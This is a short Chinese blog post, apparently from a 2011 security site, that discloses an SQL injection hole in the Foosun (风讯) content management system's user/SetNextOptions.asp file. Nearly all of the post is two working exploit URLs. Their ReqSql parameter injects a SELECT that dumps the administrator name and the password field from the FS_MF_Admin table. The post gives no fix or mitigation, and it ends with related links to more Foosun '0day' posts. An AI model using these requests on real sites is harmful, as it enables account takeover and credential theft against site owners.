foosun (风讯) 最新注入漏洞

2011, May 30, 9:25 AM. 漏洞分析
Submitted by admin

风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。

漏洞文件:

 http://www.xxx.com/user/SetNextOptions.asp

利用简单的方法:

暴管理员帐号:

http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

 

暴管理员密码:

http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin.
Tags: foosun, 风讯

« 上一篇 | 下一篇 »

只显示10条记录相关文章
foosun 0day 最新注入漏洞 (浏览: 10259, 评论: 0)
风讯的产品,你还敢用吗? (浏览: 6994, 评论: 0)
再次公布风讯两个不为人知的0day (浏览: 19319, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):